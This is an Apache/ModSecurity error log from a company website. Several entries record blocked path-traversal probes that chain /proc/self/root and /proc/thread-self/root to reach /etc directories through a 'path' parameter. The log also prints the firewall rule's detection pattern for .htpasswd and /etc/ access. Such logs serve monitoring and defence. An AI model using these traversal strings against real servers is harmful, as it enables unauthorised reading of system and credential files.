https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:56:24.142441 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:56:48.061890 2026] [proxy_fcgi:error] [pid 7893:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:57:00.411255 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:33672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw47Mdf6f5d65gmYZSZ7QAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:57:11.611166 2026] [core:alert] [pid 17887:tid 140411624429312] [client 57.141.18.102:57828] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:57:17.169807 2026] [proxy_fcgi:error] [pid 7545:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:57:45.131271 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:58:02.800598 2026] [mime_magic:error] [pid 7545:tid 140411590858496] (70014)End of file found: [client 57.141.18.43:32832] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:58:03.729791 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.228.61:35804] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw5K_qxLDW4GITHUkSHsAAAAQ4"]
[Thu Mar 19 14:58:06.145821 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:58:09.283023 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.244.43:35354] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw5MQbLMZ6AikZjR9V8IQAAAAU"]
[Thu Mar 19 14:58:30.165889 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:58:50.038152 2026] [mime_magic:error] [pid 7545:tid 140411716749056] (70014)End of file found: [client 57.141.18.74:34834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:58:53.130858 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56028] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:58:56.171364 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:47072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw5YPu8EFLIOrSqIpvHswAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:59:16.072688 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:58566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw5dPu8EFLIOrSqIpvHywAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:59:20.109834 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:59:42.139568 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57950] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:59:53.041005 2026] [mime_magic:error] [pid 17653:tid 140411582465792] (70014)End of file found: [client 57.141.18.121:37536] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:00:08.130021 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:00:34.132174 2026] [proxy_fcgi:error] [pid 7235:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:00:56.559523 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:38186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw52AkwaGbbGflqUZDpnwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 15:00:58.129794 2026] [proxy_fcgi:error] [pid 7893:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:01:20.165796 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:01:23.009243 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:36138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw58wkwaGbbGflqUZDpsQAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:01:28.727099 2026] [:error] [pid 8307:tid 140411733534464] [client 74.7.243.128:52168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw5-L-FhjpZGs9ba8qKMAAAAwE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:01:34.914265 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.21:41526] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:01:47.138506 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34580] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:01:48.102408 2026] [:error] [pid 19655:tid 140411691570944] [client 74.7.243.128:48772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw6DE1ujooLWdUDGy7zBwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:02:15.141784 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35596] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:02:46.077818 2026] [proxy_fcgi:error] [pid 7893:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36876] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:03:05.401570 2026] [:error] [pid 7545:tid 140411708356352] [client 74.7.228.61:55600] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw6WX8B84UptSoTJtYvXAAAAYQ"]
[Thu Mar 19 15:03:11.699446 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.244.43:49416] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw6X-oXxyEfFpUF8f8sNAAAAUg"]
[Thu Mar 19 15:03:13.145787 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38108] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:03:46.261850 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:04:09.125831 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40698] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:04:14.195148 2026] [core:alert] [pid 14269:tid 140411666392832] [client 57.141.18.11:48308] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:04:25.931023 2026] [core:alert] [pid 21219:tid 140411624429312] [client 57.141.18.68:48812] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:04:31.129799 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:04:41.585878 2026] [mime_magic:error] [pid 14269:tid 140411716749056] (70014)End of file found: [client 57.141.18.67:49330] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:04:55.147569 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:05:18.213773 2026] [proxy_fcgi:error] [pid 7893:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43180] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:05:41.775738 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:57734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw69eoXxyEfFpUF8f8sjQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:05:45.145805 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44218] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:05:48.382276 2026] [mime_magic:error] [pid 30077:tid 140411590858496] (70014)End of file found: [client 57.141.18.63:52120] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:05:52.072037 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:42416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7AOoXxyEfFpUF8f8slAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:06:04.930141 2026] [core:alert] [pid 27293:tid 140411565680384] [client 57.141.18.17:52894] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:06:08.150012 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:06:18.674637 2026] [:error] [pid 21055:tid 140411590858496] [client 74.7.243.128:38146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7Gl1_1ULrrQUqIjfIBQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:06:21.609247 2026] [:error] [pid 7545:tid 140411666392832] [client 74.7.243.128:38340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7HH8B84UptSoTJtYvsAAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:06:23.425181 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:38350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7H_u8EFLIOrSqIpvInAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:06:27.651145 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:38356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7IwkwaGbbGflqUZDqTQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:06:27.886501 2026] [mime_magic:error] [pid 17653:tid 140411674785536] (70014)End of file found: [client 66.249.74.160:35587] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:06:36.129814 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:06:41.953232 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:35916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7Mda6ubjKNq_cu4Z2ywAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
